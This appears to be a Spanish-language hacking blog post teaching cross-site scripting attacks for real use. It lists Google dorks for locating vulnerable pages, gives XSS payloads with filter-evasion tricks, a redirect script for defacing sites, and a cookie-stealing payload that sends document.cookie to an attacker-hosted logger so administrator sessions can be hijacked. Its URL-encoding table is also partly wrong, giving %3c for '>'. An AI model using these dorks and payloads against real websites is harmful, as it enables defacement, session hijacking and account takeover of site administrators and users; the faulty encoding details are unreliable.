Este ataque utiliza HTML y JAVASCRIPT, y con ellos podemos obtener datos, robar cookies del administrador entre otros.
Dorks:inurl:com_feedpostold/feedpost.php?url= inurl:/products/orkutclone/scrapbook.php?id= inurl:/products/classified/headersearch.php?sid= inurl:/poll/default.asp?catid= inurl:/search_results.php?search=Search&k= /preaspjobboard//Employee/emp_login.asp?msg1= pages/match_report.php?mid= pages/match_report.php?mid= /notice.php?msg= /notice.php?msg= /gen_confirm.php?errmsg= /gen_confirm.php?errmsg= /index.php?option=com_easygb&Itemid= /2wayvideochat/index.php?r= /view.php?PID= /view.php?PID= /Property-Cpanel.html?pid= /Property-Cpanel.html?pid= /showproperty.php?id= /showproperty.php?id= /vehicle/buy_do_search/?order_direction= /elms/subscribe.php?course_id= /elms/subscribe.php?course_id= /winners.php?year=2008&type= /winners.php?year=2008&type= /schoolmv2/html/studentmain.php?session= /site_search.php?sfunction= /site_search.php?sfunction= /search.php?search_keywords= /search.php?search_keywords= /hexjector.php?site= /hexjector.php?site= /news.php?id= /news.php?id= /index.php?view=help&faq=1&ref= inurl:"contentPage.php?id=" inurl:"displayResource.php?id=" intext:"Website by Mile High Creative" index.php?option=com_reservations&task=askope&nidser=2&namser= "com_reservations" /info.asp?page=fullstory&key=1&news_type=news&onvan= /ser/parohija.php?id= /ser/parohija.php?id= /strane/pas.php?id= /strane/pas.php?id= /main.php?sid= /main.php?sid=
Hay algunas Dorks, empezando con los Scripts la siguiente consulta:
<script>alert("XSS")</script>
El cual nos entrega el tipico XSS alert
Bueno asi todo, existen webs
que filtran parametros como "< " ">" o
simplemente las comillas ""
para cifrar mensajes se
puede utilizar una funcion llamada String.fromCharCode.
- String.fromCharCode(88,83,83)
<script>alert(String.fromCharCode(88,83,83))</script>
Scripts
para un deface en el website, todo esto para redirigir a su pagina de
deface:
<script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>
Si
alguna web en este caso tuviera bloqueado caracteres como > <
/, podemos usar:
>
= %3c
<
= %3c
/
= %2f
Cookie
Stealing/Logging
Ahora,
robo de cookies es la cosa más dañino que podemos hacer con XSS no
persistentes. Una cookie registrará todas las cookies del
usuario que accede a la página o a un documento determinado. La
forma más sencilla de hacer esto, sería con un proceso de tres
pasos.
En
primer lugar, usted debe configurar un sitio. Personalmente, me
parece lo mejor para http://www.000webhost.com/ oh
un hosting de paga.
Ahora,
una vez que haya creado su sitio web, vaya al administrador de
archivos. Crear un nuevo archivo. Llámelo "CookieLog.txt"
deje en blanco el código. Ahora bien, crear otro archivo con el
nombre "CookieLogger.php". En CookieLogger.php, tenemos que
añadir algo de código, para que envíe las cookies que inician una
sesión, en nuestra sesión de Cookies. Añadir este código:
Código en
Pastebin: http://pastebin.com/RAveZbpV
Ahora
que tenemos nuestro script, podemos enviar el registrador de cookies
a cualquier persona.
Esta
es la secuencia de comandos que se iniciará el registro de nuestra
cookie.
<script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie="
+ document.cookie;</script>
Una
vez que obtenga la cookie, puede utilizar el addon de Firefox
"cookies Manager" para manipular y editar las cookies para
que pueda secuestrar la sesión de los administradores. Cookie
Manager me parece una aplicación muy útil para XSS.
Scripts
y Cookie Stealling: Calebbucker - Cl Security.
0 comentarios:
Publicar un comentario